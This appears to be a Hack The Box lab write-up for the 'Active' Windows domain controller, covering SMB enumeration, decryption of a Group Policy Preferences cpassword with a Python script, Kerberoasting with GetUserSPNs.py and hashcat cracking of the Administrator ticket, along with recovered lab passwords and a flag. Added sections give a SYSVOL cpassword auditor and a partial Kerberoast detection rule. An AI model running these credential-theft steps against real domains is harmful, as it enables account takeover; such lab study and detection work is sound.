Active

This is a Windows machine from Hack The Box.

nmap -sV -sC -oA sauna 10.10.10.175

Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-27 22:55 EDT
Stats: 0:00:26 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 22.22% done; ETC: 22:56 (0:00:21 remaining)
Nmap scan report for 10.10.10.100
Host is up (0.31s latency).
Not shown: 982 closed tcp ports (conn-refused)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-08-28 02:55:45Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2023-08-28T02:56:46
|_  start_date: 2023-08-28T02:44:46
|_clock-skew: 1s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 104.36 seconds

NMAP Scan explained

nmap -sV -sC -oA sauna 10.10.10.175

As per the Nmap website:

To reflect those different uses and to simplify the choice of which scripts to run, each script contains a field associating it with one or more categories. Currently defined categories are `auth`, `broadcast`, `default`. `discovery`, `dos`, `exploit`, `external`, `fuzzer`, `intrusive`, `malware`, `safe`, `version`, and `vuln`. These are all described in [the section called “Script Categories”](https://nmap.org/book/nse-usage.html#nse-categories "Script Categories").

Searching for scripts


So, in the command nmap -sV -sC -oA sauna 10.10.10.175:

- `-sC`: This runs a script scan using the default set of scripts. It's equivalent to `--script=default` and is useful for running a series of basic tests that are generally safe and quick to perform. These scripts include various checks for common vulnerabilities, enumeration tasks, and more. The scripts are part of Nmap's Scripting Engine (NSE).

- `-sV`: This tells Nmap to perform service version detection. Nmap tries to determine the service and version information for each open port it finds. For example, it would not only identify that port 80 is open but also try to determine if it is running Apache or Nginx and which version.

Therefore the SMB scripts that are actually run with the two switches above are:

```bash
┌──(kali㉿kali)-[~/HTB/Active]
└─$ locate -r '\.nse' | xargs grep categories | grep 'default\|version' | grep smb
/usr/share/nmap/scripts/smb-os-discovery.nse:categories = {"default", "discovery", "safe"}
/usr/share/nmap/scripts/smb-security-mode.nse:categories = {"default", "discovery", "safe"}
/usr/share/nmap/scripts/smb2-security-mode.nse:categories = {"safe", "discovery", "default"}
/usr/share/nmap/scripts/smb2-time.nse:categories = {"discovery", "safe", "default"}
```

If you want to check what else is included in the "safe" category:

```bash
┌──(kali㉿kali)-[~/HTB/Active]
└─$ locate -r '\.nse' | xargs grep categories | grep 'default\|version\|safe' | grep smb
/usr/share/nmap/scripts/smb-double-pulsar-backdoor.nse:categories = {"vuln", "safe", "malware"}
/usr/share/nmap/scripts/smb-enum-services.nse:categories = {"discovery","intrusive","safe"}
/usr/share/nmap/scripts/smb-ls.nse:categories = {"discovery", "safe"}
/usr/share/nmap/scripts/smb-mbenum.nse:categories = {"discovery", "safe"}
/usr/share/nmap/scripts/smb-os-discovery.nse:categories = {"default", "discovery", "safe"}
/usr/share/nmap/scripts/smb-protocols.nse:categories = {"safe", "discovery"}
/usr/share/nmap/scripts/smb-security-mode.nse:categories = {"default", "discovery", "safe"}
/usr/share/nmap/scripts/smb-vuln-ms17-010.nse:categories = {"vuln", "safe"}
/usr/share/nmap/scripts/smb2-capabilities.nse:categories = {"safe", "discovery"}
/usr/share/nmap/scripts/smb2-security-mode.nse:categories = {"safe", "discovery", "default"}
/usr/share/nmap/scripts/smb2-time.nse:categories = {"discovery", "safe", "default"}
/usr/share/nmap/scripts/smb2-vuln-uptime.nse:categories = {"vuln", "safe"}
```

So if you want to run just the safe scripts on their own, use nmap --script safe -p 445 10.10.10.100


nmap --script safe -p 445 10.10.10.100                                                
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-28 06:03 EDT
Pre-scan script results:
| broadcast-dns-service-discovery: 
|   224.0.0.251
|     443/tcp hue
|       Address=192.168.1.121 fe80::eeb5:faff:fe3f:43f3
|     8009/tcp googlecast
|       id=4d2af0de7f5852642fd2d0b454e63b9a
|       cd=CFC87D16FF43ADAFB6C7E851317CD8C2
|       rm=3DFFE977CB4B85C7
|       Address=192.168.1.6
|     10001/tcp googlezone
|       Address=192.168.1.6
|     45670/tcp airplay
|       acl=0
|       deviceid=5C:C1:D7:2B:2C:B2
|       features=0x7F8AD0,0x38BCB46
|       rsf=0x3
|       fv=p20.T-NKLUABC-2410.0
|       flags=0x204
|       model=UTU8000
|       manufacturer=Samsung
|       serialNumber=0A363NFN601123T
|       protovers=1.1
|       srcvers=377.25.06
|       pi=22:4C:DA:D7:69:8A
|       psi=00000000-0000-0000-0000-224CDAD7698A
|       gid=00000000-0000-0000-0000-224CDAD7698A
|       Address=192.168.1.92
|     49155/tcp rdlink
|       Address=192.168.1.130 fe80::464:337e:2dfe:f7ca
|     49155/tcp rdlink
|       Address=192.168.1.136 fe80::c3b:b165:3fbe:2b39
|     49478/tcp companion-link
|       rpMac=0
|       rpHN=ac2159579038
|       Address=192.168.1.136 fe80::c3b:b165:3fbe:2b39
|     51676/tcp companion-link
|_      Address=192.168.1.130 fe80::464:337e:2dfe:f7ca
| broadcast-upnp-info: 
|   239.255.255.250
|       Server: Linux UPnP/1.0 Huawei-ATP-IGD
|_      Location: http://192.168.1.1:37215/upnpdev.xml
| targets-asn: 
|_  targets-asn.asn is a mandatory parameter
|_http-robtex-shared-ns: *TEMPORARILY DISABLED* due to changes in Robtex's API. See https://www.robtex.com/api/
|_hostmap-robtex: *TEMPORARILY DISABLED* due to changes in Robtex's API. See https://www.robtex.com/api/
Nmap scan report for active.htb (10.10.10.100)
Host is up (0.30s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds
|_smb-enum-services: ERROR: Script execution failed (use -d to debug)

Host script results:
| smb-protocols: 
|   dialects: 
|     2:0:2
|_    2:1:0
| smb2-time: 
|   date: 2023-08-28T10:04:15
|_  start_date: 2023-08-28T02:44:46
| smb2-capabilities: 
|   2:0:2: 
|     Distributed File System
|   2:1:0: 
|     Distributed File System
|     Leasing
|_    Multi-credit operations
| dns-blacklist: 
|   SPAM
|_    l2.apews.org - FAIL
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled and required
| smb-mbenum: 
|_  ERROR: Failed to connect to browser service: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
| port-states: 
|   tcp: 
|_    open: 445
|_fcrdns: FAIL (No PTR record)
| unusual-port: 
|_  WARNING: this script depends on Nmap's service/version detection (-sV)
|_msrpc-enum: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_clock-skew: 2s

Post-scan script results:
| reverse-index: 
|_  445/tcp: 10.10.10.100
Nmap done: 1 IP address (1 host up) scanned in 64.75 seconds

Nothing much was obtained from the above.

Use smbclient to list the shares with a null password:


┌──(kali㉿kali)-[~/HTB/Active]
└─$ smbclient -L //10.10.10.100                                           
Password for [WORKGROUP\kali]:
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Replication     Disk      
        SYSVOL          Disk      Logon server share 
        Users           Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

Recursively check the Replication share using smbmap: `smbmap -r Replication -H 10.10.10.100`. This failed:


└─$ smbmap -r Replication -H 10.10.10.100        

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
 -----------------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - [email protected]
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)                                
                                                                                                    
[!] Bummer:  cannot access local variable 'priv_status' where it is not associated with a value

Going to try impacket's smbclient.py with the command `smbclient.py '@IP_ADDRESS' -share SHARE_NAME -command 'recurse ON; prompt OFF; mget *'`

The above command did not work.

Used the following smbclient command instead: `smbclient //10.10.10.100/Replication -U ""%""`

┌──(kali㉿kali)-[~/HTB/Active]
└─$ smbclient //10.10.10.100/Replication -U ""%""
Try "help" to get a list of possible commands.
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI of size 119 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI (0.1 KiloBytes/sec) (average 0.0 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol (2.2 KiloBytes/sec) (average 0.6 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml (0.4 KiloBytes/sec) (average 0.6 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (0.9 KiloBytes/sec) (average 0.6 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 3722 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (3.0 KiloBytes/sec) (average 0.9 KiloBytes/sec)
smb: \> 

From ChatGPT

  • Groups.xml: The Groups.xml file could contain information about local group policies, including potentially sensitive information like usernames and even encrypted passwords.
  • Groups.xml: You might find information on users or even passwords that you can decrypt and use for privilege escalation.

Searching for this file after it was downloaded with mget:


┌──(kali㉿kali)-[~/HTB/Active]
└─$ locate Groups.xml                                                                                                              
/home/kali/HTB/Active/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
                                                                                                                                               
┌──(kali㉿kali)-[~/HTB/Active]
└─$ cd /home/kali/HTB/Active/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/
                                                                                                                                               
┌──(kali㉿kali)-[~/…/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups]
└─$ more Groups.xml                                                                          
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2"
 changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassw
ord="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acct
Disabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
                                                                                                                                               
┌──(kali㉿kali)-[~/…/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups]

Found a Python utility online. The Python code is below. You need to install pycryptodome first:

┌──(kali㉿kali)-[~/…/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups]
└─$ pip install pycryptodome
Defaulting to user installation because normal site-packages is not writeable
Collecting pycryptodome
  Obtaining dependency information for pycryptodome from https://files.pythonhosted.org/packages/40/88/89623388754162ddb82c62814ccbfdbfcc8ed9bd6d5f7412d2479bdca3a7/pycryptodome-3.18.0-cp35-abi3-manylinux_2_17_x86_64.manylinux2014_x86_64.whl.metadata
  Downloading pycryptodome-3.18.0-cp35-abi3-manylinux_2_17_x86_64.manylinux2014_x86_64.whl.metadata (3.4 kB)
Downloading pycryptodome-3.18.0-cp35-abi3-manylinux_2_17_x86_64.manylinux2014_x86_64.whl (2.1 MB)
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 2.1/2.1 MB 6.0 MB/s eta 0:00:00
Installing collected packages: pycryptodome
Successfully installed pycryptodome-3.18.0

The Python code:

```python
#!/usr/bin/env python3
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
from base64 import b64decode
import binascii

def decrypt_cpassword(cpassword):
    # Static AES-256 key published by Microsoft for GPP cpassword values
    key = binascii.unhexlify("4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")

    # Restore the base64 padding that GPP strips, then decode
    cpassword += "=" * ((4 - len(cpassword) % 4) % 4)
    cpassword_decoded = b64decode(cpassword)

    # Decrypt using AES-CBC with the static key and an all-zero IV
    cipher = AES.new(key, AES.MODE_CBC, iv=b"\x00" * 16)
    decrypted = unpad(cipher.decrypt(cpassword_decoded), 16)

    # The password is stored as UTF-16LE; say so explicitly rather than
    # relying on the host's native byte order
    return decrypted.decode('utf-16-le')

# Test with a sample cpassword
cpassword = "YourEncryptedPasswordHere"
print(decrypt_cpassword(cpassword))
```

Replace the placeholder cpassword in the Python script with the value from Groups.xml:


```python
#!/usr/bin/env python3
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
from base64 import b64decode
import binascii

def decrypt_cpassword(cpassword):
    # Static AES-256 key published by Microsoft for GPP cpassword values
    key = binascii.unhexlify("4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")

    # Restore the base64 padding that GPP strips, then decode
    cpassword += "=" * ((4 - len(cpassword) % 4) % 4)
    cpassword_decoded = b64decode(cpassword)

    # Decrypt using AES-CBC with the static key and an all-zero IV
    cipher = AES.new(key, AES.MODE_CBC, iv=b"\x00" * 16)
    decrypted = unpad(cipher.decrypt(cpassword_decoded), 16)

    # The password is stored as UTF-16LE; say so explicitly rather than
    # relying on the host's native byte order
    return decrypted.decode('utf-16-le')

# The cpassword value taken from Groups.xml
cpassword = "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
print(decrypt_cpassword(cpassword))
```

Run the python script


┌──(kali㉿kali)-[~/HTB/Active]
└─$ ./decode.py  
GPPstillStandingStrong2k18
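The decode script above handles one value pasted in by hand. From the defender's side the useful version walks a SYSVOL copy, finds every Preferences file that still carries a cpassword attribute and reports the account it belongs to. This is an added example written for this writeup, not the author's decode.py; the sample tree it builds is constructed from the Groups.xml shown above plus a Services.xml with an empty cpassword, and plaintext is only produced when pycryptodome is installed.

```python
#!/usr/bin/env python3
"""Audit a local SYSVOL copy (such as the tree pulled with mget above) for
Group Policy Preferences files that still carry a cpassword attribute.
Added example for this writeup; constructed sample data, see below."""
import base64
import os
import tempfile
import xml.etree.ElementTree as ET

# Preferences files that can carry a cpassword attribute (the MS14-025 set).
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}

# AES-256 key Microsoft published for cpassword; the same key decode.py uses.
GPP_AES_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")


def decrypt_cpassword(cpassword):
    """Return the plaintext, or None when pycryptodome is not available."""
    try:
        from Crypto.Cipher import AES
        from Crypto.Util.Padding import unpad
    except ImportError:
        return None
    padded = cpassword + "=" * ((4 - len(cpassword) % 4) % 4)
    raw = base64.b64decode(padded)
    cipher = AES.new(GPP_AES_KEY, AES.MODE_CBC, iv=b"\x00" * 16)
    return unpad(cipher.decrypt(raw), 16).decode("utf-16-le")


def scan_file(path):
    """One finding per element with a non-empty cpassword attribute."""
    findings = []
    try:
        root = ET.parse(path).getroot()
    except ET.ParseError:
        return findings
    # cpassword sits on <Properties>; its parent (<User>, <NTService>, ...)
    # carries the display name and the 'changed' timestamp.
    for parent in root.iter():
        for child in parent:
            cpass = child.get("cpassword")
            if not cpass:          # absent or "" means no password was set
                continue
            account = (child.get("userName") or child.get("accountName")
                       or child.get("runAs") or parent.get("name") or "")
            findings.append({"file": path, "element": parent.tag,
                             "account": account,
                             "changed": parent.get("changed", ""),
                             "cpassword": cpass,
                             "plaintext": decrypt_cpassword(cpass)})
    return findings


def scan_sysvol(root_dir):
    """Walk a SYSVOL copy and collect cpassword findings from GPP XML files."""
    findings = []
    for dirpath, _, files in os.walk(root_dir):
        for name in files:
            if name in GPP_FILES:
                findings.extend(scan_file(os.path.join(dirpath, name)))
    return findings


# Constructed sample tree: the Groups.xml recovered above, plus a Services.xml
# (constructed, no clsid attributes) whose empty cpassword must not be reported.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\\SVC_TGS"/></User>
</Groups>
"""
SAMPLE_SERVICES_XML = """<?xml version="1.0" encoding="utf-8"?>
<NTServices><NTService name="Spooler" changed="2018-07-18 20:50:00"><Properties startupType="AUTOMATIC" serviceName="Spooler" accountName="LocalSystem" cpassword=""/></NTService>
</NTServices>
"""


def build_sample_tree():
    """Write the constructed files under a temp dir laid out like SYSVOL."""
    base = tempfile.mkdtemp(prefix="sysvol_")
    prefs = os.path.join(base, "active.htb", "Policies",
                         "{31B2F340-016D-11D2-945F-00C04FB984F9}",
                         "MACHINE", "Preferences")
    for sub, name, text in (("Groups", "Groups.xml", SAMPLE_GROUPS_XML),
                            ("Services", "Services.xml", SAMPLE_SERVICES_XML)):
        os.makedirs(os.path.join(prefs, sub), exist_ok=True)
        with open(os.path.join(prefs, sub, name), "w", encoding="utf-8") as fh:
            fh.write(text)
    return base


if __name__ == "__main__":
    for f in scan_sysvol(build_sample_tree()):
        shown = f["plaintext"] or "(install pycryptodome to decrypt)"
        print(f"{f['file']}: <{f['element']}> account={f['account']} "
              f"changed={f['changed']} plaintext={shown}")
```

Point `scan_sysvol` at the `active.htb` directory pulled from the Replication share (or at a live `\\DC\SYSVOL` mount) to get the same report for real data; any hit is a password that every domain user could read.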
                            

Connect to the shares using smbclient with the recovered username and password:


┌──(kali㉿kali)-[~/HTB/Active]
└─$ smbclient //10.10.10.100/Users -U active.htb\\SVC_TGS%GPPstillStandingStrong2k18
Try "help" to get a list of possible commands.
smb: \> dir
  .                                  DR        0  Sat Jul 21 10:39:20 2018
  ..                                 DR        0  Sat Jul 21 10:39:20 2018
  Administrator                       D        0  Mon Jul 16 06:14:21 2018
  All Users                       DHSrn        0  Tue Jul 14 01:06:44 2009
  Default                           DHR        0  Tue Jul 14 02:38:21 2009
  Default User                    DHSrn        0  Tue Jul 14 01:06:44 2009
  desktop.ini                       AHS      174  Tue Jul 14 00:57:55 2009
  Public                             DR        0  Tue Jul 14 00:57:55 2009
  SVC_TGS                             D        0  Sat Jul 21 11:16:32 2018

                5217023 blocks of size 4096. 278327 blocks available
smb: \> cd SVC_TGS\
smb: \SVC_TGS\> cd Desktop\
smb: \SVC_TGS\Desktop\> ls
  .                                   D        0  Sat Jul 21 11:14:42 2018
  ..                                  D        0  Sat Jul 21 11:14:42 2018
  user.txt                           AR       34  Sun Aug 27 22:45:51 2023

                5217023 blocks of size 4096. 278327 blocks available
smb: \SVC_TGS\Desktop\> cat users.txt 
cat: command not found
smb: \SVC_TGS\Desktop\> get user.txt 
getting file \SVC_TGS\Desktop\user.txt of size 34 as user.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \SVC_TGS\Desktop\> exit
                                                                                                                                                                      
┌──(kali㉿kali)-[~/HTB/Active]
└─$ ls
active.gnmap  active.htb  active.nmap  active.xml  decode.py  kerbrute  users.txt  user.txt
                                                                                                                                                                      
┌──(kali㉿kali)-[~/HTB/Active]
└─$ cat user.txt
7230de90eec1be42f0ae91ed9e955dca
                                                                                                                                                                      
┌──(kali㉿kali)-[~/HTB/Active]

Use the impacket GetUserSPNs.py script to request service tickets for any accounts with an SPN:


└─$ ./GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS
Impacket v0.11.0 - Copyright 2023 Fortra

Password:
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2023-08-27 22:45:57.011359             



[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$e69032a5dce3d0f1774ce9dac1574da8$[...]
                                                                                                                                                            
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ 

┌──(kali㉿kali)-[/usr/bin]
└─$ ./hashcat --example-hashes | less 
Hash mode #13100
  Name................: Kerberos 5, etype 23, TGS-REP
  Category............: Network Protocol
  Slow.Hash...........: No
  Password.Len.Min....: 0
  Password.Len.Max....: 256
  Salt.Type...........: Embedded
  Salt.Len.Min........: 0
  Salt.Len.Max........: 256
  Kernel.Type(s)......: pure, optimized
  Example.Hash.Format.: plain
  Example.Hash........: $krb5tgs$23$*user$realm$test/spn*$b548e10f5694a...24d9a [Truncated, use --mach for full length]
  Example.Pass........: hashcat
  Benchmark.Mask......: ?b?b?b?b?b?b?b
  Autodetect.Enabled..: Yes
  Self.Test.Enabled...: Yes
  Potfile.Enabled.....: Yes
  Custom.Plugin.......: No
  Plaintext.Encoding..: ASCII, HEX

Using hashcat and rockyou

┌──(kali㉿kali)-[/usr/bin]
└─$ ./hashcat -m 13100 /home/kali/HTB/Active/active /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 4.0+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-sandybridge-11th Gen Intel(R) Core(TM) i7-1160G7 @ 1.20GHz, 2815/5694 MB (1024 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 1 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

Cracking performance lower than expected?                 

* Append -O to the commandline.
  This lowers the maximum supported password/salt length (usually down to 32).

* Append -w 3 to the commandline.
  This can cause your screen to lag.

* Append -S to the commandline.
  This has a drastic speed impact but can be better for specific attacks.
  Typical scenarios are a small wordlist but a large ruleset.

* Update your backend API runtime / driver the right way:
  https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
  https://hashcat.net/faq/morework

$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$e69032a5dce3d0f1774ce9dac1574da8$[...]:Ticketmaster1968
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Ad...b3aebe
Time.Started.....: Mon Aug 28 08:18:20 2023 (23 secs)
Time.Estimated...: Mon Aug 28 08:18:43 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   456.6 kH/s (2.32ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10539008/14344385 (73.47%)
Rejected.........: 0/10539008 (0.00%)
Restore.Point....: 10536960/14344385 (73.46%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: Tiffany95 -> Thelittlemermaid
Hardware.Mon.#1..: Util: 73%

Started: Mon Aug 28 08:17:46 2023
Stopped: Mon Aug 28 08:18:45 2023

Password is Ticketmaster1968
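The Kerberoast above leaves a trace on the domain controller: every ticket GetUserSPNs pulled is a Security event 4769 with RC4-HMAC as the encryption type (0x17, the same etype 23 hashcat mode 13100 cracks) for an SPN that belongs to a user account. The rule below, an added example for this writeup and not part of the original post, runs over constructed 4769 records (real 4769 field names, made-up values) and flags exactly that combination while ignoring computer accounts, krbtgt and failed requests.

```python
#!/usr/bin/env python3
"""Flag Kerberoast-style requests in Windows Security event 4769 records: a
successful service-ticket request issued with RC4-HMAC (etype 0x17, the
"$krb5tgs$23$" format cracked above) for an SPN held by a user account.
Added example for this writeup; the sample events are constructed."""
from collections import defaultdict

RC4_HMAC = 0x17                 # AES tickets would be 0x11 (AES128) / 0x12 (AES256)
IGNORED_SERVICES = {"krbtgt"}   # TGT-related requests, not a roastable SPN

# Constructed records using the 4769 event's field names. Source IPs and the
# 'sqlsvc' service name are made up for the example.
SAMPLE_4769_EVENTS = [
    # Routine traffic: AES ticket for a computer account SPN.
    "EventID=4769 TargetUserName=SVC_TGS@ACTIVE.HTB ServiceName=DC$ "
    "TicketEncryptionType=0x12 Status=0x0 IpAddress=::ffff:10.10.10.100",
    # What GetUserSPNs -request produced above: RC4 ticket for the SPN held
    # by the Administrator user account (active/CIFS:445).
    "EventID=4769 TargetUserName=SVC_TGS@ACTIVE.HTB ServiceName=Administrator "
    "TicketEncryptionType=0x17 Status=0x0 IpAddress=::ffff:10.10.14.2",
    # krbtgt as the service: excluded, not what Kerberoast targets.
    "EventID=4769 TargetUserName=SVC_TGS@ACTIVE.HTB ServiceName=krbtgt "
    "TicketEncryptionType=0x17 Status=0x0 IpAddress=::ffff:10.10.14.2",
    # Non-zero Status: the KDC refused, so no ticket exists to crack.
    "EventID=4769 TargetUserName=SVC_TGS@ACTIVE.HTB ServiceName=sqlsvc "
    "TicketEncryptionType=0x17 Status=0x1b IpAddress=::ffff:10.10.14.2",
    # Different event id (4768, TGT request): out of scope for this rule.
    "EventID=4768 TargetUserName=SVC_TGS@ACTIVE.HTB ServiceName=krbtgt "
    "TicketEncryptionType=0x17 Status=0x0 IpAddress=::ffff:10.10.14.2",
]


def parse_event(line):
    """Turn a 'Key=Value Key=Value' record into a dict (values may contain ':')."""
    return dict(tok.split("=", 1) for tok in line.split())


def is_kerberoast_candidate(ev):
    """True for an RC4 service ticket successfully issued for a user-account SPN."""
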